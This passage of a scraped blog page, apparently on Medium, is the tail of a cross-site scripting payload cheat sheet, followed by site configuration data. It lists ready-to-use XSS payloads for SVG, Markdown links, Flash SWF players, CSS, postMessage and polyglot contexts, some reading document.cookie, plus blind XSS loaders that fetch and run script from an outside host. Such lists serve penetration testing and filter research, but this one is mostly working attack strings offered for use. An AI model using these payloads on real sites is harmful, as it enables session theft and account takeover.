ou\"\u003e\u0026lt;svg\u0026gt;\u0026lt;desc\u0026gt;\u0026lt;![CDATA[\u0026lt;\/desc\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/svg\u0026gt;\u003cbr\u003e\u0026lt;svg\u0026gt;\u0026lt;foreignObject\u0026gt;\u0026lt;![CDATA[\u0026lt;\/foreignObject\u0026gt;\u0026lt;script\u0026gt;alert(2)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/svg\u0026gt;\u003cbr\u003e\u0026lt;svg\u0026gt;\u0026lt;title\u0026gt;\u0026lt;![CDATA[\u0026lt;\/title\u0026gt;\u0026lt;script\u0026gt;alert(3)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/svg\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"bc4e\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in Markdown\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"33d2\" class=\"oq mh gu om b ij or os l ot ou\"\u003e[a](javascript:prompt(document.cookie))\u003cbr\u003e[a](j a v a s c r i p t:prompt(document.cookie))\u003cbr\u003e[a](data:text\/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\u003cbr\u003e[a](javascript:window.onerror=alert;throw%201)\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"8ba2\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SWF flash application\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"1187\" class=\"oq mh gu om b ij or os l ot ou\"\u003eBrowsers 
other than IE: \u003ca class=\"af ow\" href=\"http:\/\/0me.me\/demo\/xss\/xssproject.swf?js=alert%28document.domain%29%3B\" rel=\"noopener ugc nofollow\" target=\"_blank\"\u003ehttp:\/\/0me.me\/demo\/xss\/xssproject.swf?js=alert(document.domain);\u003c\/a\u003e\u003cbr\u003eIE8: \u003ca class=\"af ow\" href=\"http:\/\/0me.me\/demo\/xss\/xssproject.swf?js=try%7Balert%28document.domain%29%7Dcatch%28e%29%7B\" rel=\"noopener ugc nofollow\" target=\"_blank\"\u003ehttp:\/\/0me.me\/demo\/xss\/xssproject.swf?js=try{alert(document.domain)}catch(e){\u003c\/a\u003e window.open(‘?js=history.go(-1)’,’_self’);}\u003cbr\u003eIE9: http:\/\/0me.me\/demo\/xss\/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"f9a2\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SWF flash application\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"2596\" class=\"oq mh gu om b ij or os l ot ou\"\u003eflashmediaelement.swf?jsinitfunctio%gn=alert`1`\u003cbr\u003eflashmediaelement.swf?jsinitfunctio%25gn=alert(1)\u003cbr\u003eZeroClipboard.swf?id=\\\"))} catch(e) {alert(1);}\/\/\u0026amp;width=1000\u0026amp;height=1000\u003cbr\u003eswfupload.swf?movieName=\"]);}catch(e){}if(!self.a)self.a=!alert(1);\/\/\u003cbr\u003eswfupload.swf?buttonText=test\u0026lt;a href=\"javascript:confirm(1)\"\u0026gt;\u0026lt;img 
src=\"https:\/\/web.archive.org\/web\/20130730223443im_\/http:\/\/appsec.ws\/ExploitDB\/cMon.jpg\"\/\u0026gt;\u0026lt;\/a\u0026gt;\u0026amp;.swf\u003cbr\u003eplupload.flash.swf?%#target%g=alert\u0026amp;uid%g=XSS\u0026amp;\u003cbr\u003emoxieplayer.swf?url=https:\/\/github.com\/phwd\/poc\/blob\/master\/vid.flv?raw=true\u003cbr\u003evideo-js.swf?readyFunction=alert(1)\u003cbr\u003eplayer.swf?playerready=alert(document.cookie)\u003cbr\u003eplayer.swf?tracecall=alert(document.cookie)\u003cbr\u003ebanner.swf?clickTAG=javascript:alert(1);\/\/\u003cbr\u003eio.swf?yid=\\\"));}catch(e){alert(1);}\/\/\u003cbr\u003evideo-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29\u003cbr\u003ebookContent.swf?currentHTMLURL=data:text\/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4\u003cbr\u003eflashcanvas.swf?id=test\\\"));}catch(e){alert(document.domain)}\/\/\u003cbr\u003ephpmyadmin\/js\/canvg\/flashcanvas.swf?id=test\\”));}catch(e){alert(document.domain)}\/\/\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"af79\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in CSS\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"8678\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;!DOCTYPE html\u0026gt;\u003cbr\u003e\u0026lt;html\u0026gt;\u003cbr\u003e\u0026lt;head\u0026gt;\u003cbr\u003e\u0026lt;style\u0026gt;\u003cbr\u003ediv  {\u003cbr\u003e    background-image: url(\"data:image\/jpg;base64,\u0026lt;\\\/style\u0026gt;\u0026lt;svg\/onload=alert(document.domain)\u0026gt;\");\u003cbr\u003e    background-color: #cccccc;\u003cbr\u003e}\u003cbr\u003e\u0026lt;\/style\u0026gt;\u003cbr\u003e\u0026lt;\/head\u0026gt;\u003cbr\u003e  \u0026lt;body\u0026gt;\u003cbr\u003e    \u0026lt;div\u0026gt;lol\u0026lt;\/div\u0026gt;\u003cbr\u003e  
\u0026lt;\/body\u0026gt;\u003cbr\u003e\u0026lt;\/html\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"284c\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eXSS in PostMessage\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"9b32\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cem class=\"gu\"\u003eIf the target origin is an asterisk (*), the message can be sent to any domain that has a reference to the child page. A page that receives messages should compare event.origin with an allowlist before it acts on the message data.\u003c\/em\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"2a58\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;html\u0026gt;\u003cbr\u003e\u0026lt;body\u0026gt;\u003cbr\u003e    \u0026lt;input type=button value=\"Click Me\" id=\"btn\"\u0026gt;\u003cbr\u003e\u0026lt;\/body\u0026gt;\u003c\/span\u003e\u003cspan id=\"aba8\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;script\u0026gt;\u003cbr\u003edocument.getElementById('btn').onclick = function(e){\u003cbr\u003e    window.poc = window.open('http:\/\/www.redacted.com\/#login');\u003cbr\u003e    setTimeout(function(){\u003cbr\u003e        window.poc.postMessage(\u003cbr\u003e            {\u003cbr\u003e                \"sender\": \"accounts\",\u003cbr\u003e                \"url\": \"javascript:confirm('XSS')\",\u003cbr\u003e            },\u003cbr\u003e            '*'\u003cbr\u003e        );\u003cbr\u003e    }, 2000);\u003cbr\u003e}\u003cbr\u003e\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;\/html\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"c0d0\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eBlind XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\n\u003cp id=\"dea0\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS 
Hunter\u003c\/strong\u003e\u003c\/p\u003e\n\u003cp id=\"474b\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eXSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.\u003c\/p\u003e\n\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"0d2c\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\"\u0026gt;\u0026lt;script src=\/\/yoursubdomain.xss.ht\u0026gt;\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003cspan id=\"03b6\" class=\"oq mh gu om b ij ov os l ot ou\"\u003ejavascript:eval('var a=document.createElement(\\'script\\');a.src=\\'https:\/\/yoursubdomain.xss.ht\\';document.body.appendChild(a)')\u003c\/span\u003e\u003cspan id=\"7ecb\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;script\u0026gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"\/\/yoursubdomain.xss.ht\");a.send();\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003cspan id=\"e819\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;script\u0026gt;$.getScript(\"\/\/yoursubdomain.xss.ht\")\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"df9f\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003ePolyglot XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"17cb\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — 0xsobky\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"af81\" class=\"oq mh gu om b ij or os l ot 
ou\"\u003ejaVasCript:\/*-\/*`\/*\\`\/*'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/\u0026lt;\/stYle\/\u0026lt;\/titLe\/\u0026lt;\/teXtarEa\/\u0026lt;\/scRipt\/--!\u0026gt;\\x3csVg\/\u0026lt;sVg\/oNloAd=alert()\/\/\u0026gt;\\x3e\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"719c\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Ashar Javed\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"8a6d\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\"\u0026gt;\u0026gt;\u0026lt;marquee\u0026gt;\u0026lt;img src=x onerror=confirm(1)\u0026gt;\u0026lt;\/marquee\u0026gt;\" \u0026gt;\u0026lt;\/plaintext\\\u0026gt;\u0026lt;\/|\\\u0026gt;\u0026lt;plaintext\/onmouseover=prompt(1) \u0026gt;\u0026lt;script\u0026gt;prompt(1)\u0026lt;\/script\u0026gt;@gmail.com\u0026lt;isindex formaction=javascript:alert(\/XSS\/) type=submit\u0026gt;'--\u0026gt;\" \u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;\/script\u0026gt;\"\u0026gt;\u0026lt;img\/id=\"confirm\u0026amp;lpar; 1)\"\/alt=\"\/\"src=\"\/\"onerror=eval(id\u0026amp;%23x29;\u0026gt;'\"\u0026gt;\u0026lt;img src=\"http: \/\/i.imgur.com\/P8mL8.jpg\"\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"ddac\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Mathias Karlsson\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"4fa1\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\" onclick=alert(1)\/\/\u0026lt;button ‘ onclick=alert(1)\/\/\u0026gt; *\/ alert(1)\/\/\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp 
id=\"644e\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Rsnake\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"db6d\" class=\"oq mh gu om b ij or os l ot ou\"\u003e';alert(String.fromCharCode(88,83,83))\/\/';alert(String. fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode (88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/-- \u0026gt;\u0026lt;\/SCRIPT\u0026gt;\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String.fromCharCode(88,83,83)) \u0026lt;\/SCRIPT\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"7bad\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Daniel Miessler\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"afc0\" class=\"oq mh gu om b ij or os l ot ou\"\u003e';alert(String.fromCharCode(88,83,83))\/\/';alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/--\u0026gt;\u0026lt;\/SCRIPT\u0026gt;\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String.fromCharCode(88,83,83))\u0026lt;\/SCRIPT\u0026gt;\u003cbr\u003e“ onclick=alert(1)\/\/\u0026lt;button ‘ onclick=alert(1)\/\/\u0026gt; *\/ alert(1)\/\/\u003cbr\u003e'\"\u0026gt;\u0026gt;\u0026lt;marquee\u0026gt;\u0026lt;img src=x onerror=confirm(1)\u0026gt;\u0026lt;\/marquee\u0026gt;\"\u0026gt;\u0026lt;\/plaintext\\\u0026gt;\u0026lt;\/|\\\u0026gt;\u0026lt;plaintext\/onmouseover=prompt(1)\u0026gt;\u0026lt;script\u0026gt;prompt(1)\u0026lt;\/script\u0026gt;@gmail.com\u0026lt;isindex formaction=javascript:alert(\/XSS\/) 
type=submit\u0026gt;'--\u0026gt;\"\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;\/script\u0026gt;\"\u0026gt;\u0026lt;img\/id=\"confirm\u0026amp;lpar;1)\"\/alt=\"\/\"src=\"\/\"onerror=eval(id\u0026amp;%23x29;\u0026gt;'\"\u0026gt;\u0026lt;img src=\"http:\/\/i.imgur.com\/P8mL8.jpg\"\u0026gt;\u003cbr\u003ejavascript:\/\/'\/\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/script\u0026gt;--\u0026gt;\u0026lt;p\" onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\"\/\u0026lt;\/textarea\u0026gt;*\/\u0026lt;alert()\/*' onclick=alert()\/\/\u0026gt;a\u003cbr\u003ejavascript:\/\/\u0026lt;\/title\u0026gt;\"\/\u0026lt;\/script\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\/--\u0026gt;*\/\u0026lt;alert()\/*' onclick=alert()\/\/\u0026gt;\/\u003cbr\u003ejavascript:\/\/\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;a\"\/\/' onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/'\/\/\" --\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;b onclick= alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/\u0026lt;\/title\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/script --\u0026gt;\u0026lt;li '\/\/\" '*\/alert()\/*', onclick=alert()\/\/\u003cbr\u003ejavascript:alert()\/\/--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;a\"\/\/' onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003e--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\"\/\u0026lt;\/textarea\u0026gt;\u0026lt;a' 
onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003e\/\u0026lt;\/title\/'\/\u0026lt;\/style\/\u0026lt;\/script\/\u0026lt;\/textarea\/--\u0026gt;\u0026lt;p\" onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/--\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;svg \"\/\/' onclick=alert()\/\/\u003cbr\u003e\/\u0026lt;\/title\/'\/\u0026lt;\/style\/\u0026lt;\/script\/--\u0026gt;\u0026lt;p\" onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"54c4\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — from \u003c\/strong\u003e\u003ca class=\"af ow\" href=\"http:\/\/polyglot.innerht.ml\" rel=\"noopener ugc nofollow\" target=\"_blank\"\u003e\u003cstrong class=\"nk gv\"\u003e@filedescriptor’s Polyglot Challenge\u003c\/strong\u003e\u003c\/a\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"3b0d\" class=\"oq mh gu om b ij or os l ot ou\"\u003e# by crlf\u003cbr\u003ejavascript:\"\/*'\/*`\/*--\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/template\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;html \\\" onmouseover=\/*\u0026amp;lt;svg\/*\/onload=alert()\/\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"9f09\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e# by europa\u003cbr\u003ejavascript:\"\/*'\/*`\/*\\\" \/*\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/template\u0026gt;\u0026lt;\/script\/--\u0026gt;\u0026amp;lt;svg\/onload=\/*\u0026lt;html\/*\/onmouseover=alert()\/\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"6a4c\" class=\"oq mh gu om b ij ov os l 
ot ou\"\u003e# by EdOverflow\u003cbr\u003ejavascript:\"\/*\\\"\/*`\/*' \/*\u0026lt;\/template\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/script\u0026gt;--\u0026gt;\u0026amp;lt;svg onload=\/*\u0026lt;html\/*\/onmouseover=alert()\/\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"9ee2\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e# by h1\/ragnar\u003cbr\u003ejavascript:`\/\/\"\/\/\\\"\/\/\u0026lt;\/title\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/template\u0026gt;\u0026amp;lt;svg\/onload='\/*--\u0026gt;\u0026lt;html *\/ onmouseover=alert()\/\/'\u0026gt;`\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"ba14\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003e\u003cem class=\"gu\"\u003eThank you for watching and How did you like this blog ? 
Tell me in the comment box.\u003c\/em\u003e\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/section\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/article\u003e\n\u003c\/div\u003e\n
8ccfed20cbb2\"],\"tierOneDomains\":[\"medium.com\",\"thebolditalic.com\",\"arcdigital.media\",\"towardsdatascience.com\",\"uxdesign.cc\",\"codeburst.io\",\"psiloveyou.xyz\",\"writingcooperative.com\",\"entrepreneurshandbook.co\",\"prototypr.io\",\"betterhumans.coach.me\",\"theascent.pub\"],\"topicsToFollow\":[\"d61cf867d93f\",\"8a146bc21b28\",\"1eca0103fff3\",\"4d562ee63426\",\"aef1078a3ef5\",\"e15e46793f8d\",\"6158eb913466\",\"55f1c20aba7a\",\"3d18b94f6858\",\"4861fee224fd\",\"63c6f1f93ee\",\"1d98b3a9a871\",\"decb52b64abf\",\"ae5d4995e225\",\"830cded25262\"],\"topicToTagMappings\":{\"accessibility\":\"accessibility\",\"addiction\":\"addiction\",\"android-development\":\"android-development\",\"art\":\"art\",\"artificial-intelligence\":\"artificial-intelligence\",\"astrology\":\"astrology\",\"basic-income\":\"basic-income\",\"beauty\":\"beauty\",\"biotech\":\"biotech\",\"blockchain\":\"blockchain\",\"books\":\"books\",\"business\":\"business\",\"cannabis\":\"cannabis\",\"cities\":\"cities\",\"climate-change\":\"climate-change\",\"comics\":\"comics\",\"coronavirus\":\"coronavirus\",\"creativity\":\"creativity\",\"cryptocurrency\":\"cryptocurrency\",\"culture\":\"culture\",\"cybersecurity\":\"cybersecurity\",\"data-science\":\"data-science\",\"design\":\"design\",\"digital-life\":\"digital-life\",\"disability\":\"disability\",\"economy\":\"economy\",\"education\":\"education\",\"equality\":\"equality\",\"family\":\"family\",\"feminism\":\"feminism\",\"fiction\":\"fiction\",\"film\":\"film\",\"fitness\":\"fitness\",\"food\":\"food\",\"freelancing\":\"freelancing\",\"future\":\"future\",\"gadgets\":\"gadgets\",\"gaming\":\"gaming\",\"gun-control\":\"gun-control\",\"health\":\"health\",\"history\":\"history\",\"humor\":\"humor\",\"immigration\":\"immigration\",\"ios-development\":\"ios-development\",\"javascript\":\"javascript\",\"justice\":\"justice\",\"language\":\"language\",\"leadership\":\"leadership\",\"lgbtqia\":\"lgbtqia\",\"lifestyle\":\"lifestyle\",\"machine-le
arning\":\"machine-learning\",\"makers\":\"makers\",\"marketing\":\"marketing\",\"math\":\"math\",\"media\":\"media\",\"mental-health\":\"mental-health\",\"mindfulness\":\"mindfulness\",\"money\":\"money\",\"music\":\"music\",\"neuroscience\":\"neuroscience\",\"nonfiction\":\"nonfiction\",\"outdoors\":\"outdoors\",\"parenting\":\"parenting\",\"pets\":\"pets\",\"philosophy\":\"philosophy\",\"photography\":\"photography\",\"podcasts\":\"podcast\",\"poetry\":\"poetry\",\"politics\":\"politics\",\"privacy\":\"privacy\",\"product-management\":\"product-management\",\"productivity\":\"productivity\",\"programming\":\"programming\",\"psychedelics\":\"psychedelics\",\"psychology\":\"psychology\",\"race\":\"race\",\"relationships\":\"relationships\",\"religion\":\"religion\",\"remote-work\":\"remote-work\",\"san-francisco\":\"san-francisco\",\"science\":\"science\",\"self\":\"self\",\"self-driving-cars\":\"self-driving-cars\",\"sexuality\":\"sexuality\",\"social-media\":\"social-media\",\"society\":\"society\",\"software-engineering\":\"software-engineering\",\"space\":\"space\",\"spirituality\":\"spirituality\",\"sports\":\"sports\",\"startups\":\"startup\",\"style\":\"style\",\"technology\":\"technology\",\"transportation\":\"transportation\",\"travel\":\"travel\",\"true-crime\":\"true-crime\",\"tv\":\"tv\",\"ux\":\"ux\",\"venture-capital\":\"venture-capital\",\"visual-design\":\"visual-design\",\"work\":\"work\",\"world\":\"world\",\"writing\":\"writing\"},\"defaultImages\":{\"avatar\":{\"imageId\":\"1*dmbNkD5D-u45r44go_cf0g.png\",\"height\":150,\"width\":150},\"orgLogo\":{\"imageId\":\"7*V1_7XP4snlmqrc_0Njontw.png\",\"height\":110,\"width\":500},\"postLogo\":{\"imageId\":\"bd978bb536350a710e8efb012513429cabdc4c28700604261aeda246d0f980b7\",\"height\":810,\"width\":1440},\"postPreviewImage\":{\"imageId\":\"1*hn4v1tCaJy7cWMyb0bpNpQ.png\",\"height\":386,\"width\":579}},\"collectionStructuredData\":{\"8d6b8a439e32\":{\"name\":\"Elemental\",\"data\":{\"@type\":\"NewsMediaOrgan
ization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fcdn-images-1.medium.com\\u002Fmax\\u002F980\\u002F1*9ygdqoKprhwuTVKUM0DLPA@2x.png\",\"width\":980,\"height\":159}}},\"3f6ecf56618\":{\"name\":\"Forge\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fcdn-images-1.medium.com\\u002Fmax\\u002F596\\u002F1*uULpIlImcO5TDuBZ6lm7Lg@2x.png\",\"width\":596,\"height\":183}}},\"ae2a65f35510\":{\"name\":\"GEN\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F264\\u002F1*RdVZMdvfV3YiZTw6mX7yWA.png\",\"width\":264,\"height\":140}}},\"88d9857e584e\":{\"name\":\"LEVEL\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F540\\u002F1*JqYMhNX6KNNb2UlqGqO2WQ.png\",\"width\":540,\"height\":108}}},\"7b6769f2748b\":{\"name\":\"Marker\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fcdn-images-1.medium.com\\u002Fmax\\u002F383\\u002F1*haCUs0wF6TgOOvfoY-jEoQ@2x.png\",\"width\":383,\"height\":92}}},\"444d13b52878\":{\"name\":\"OneZero\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medi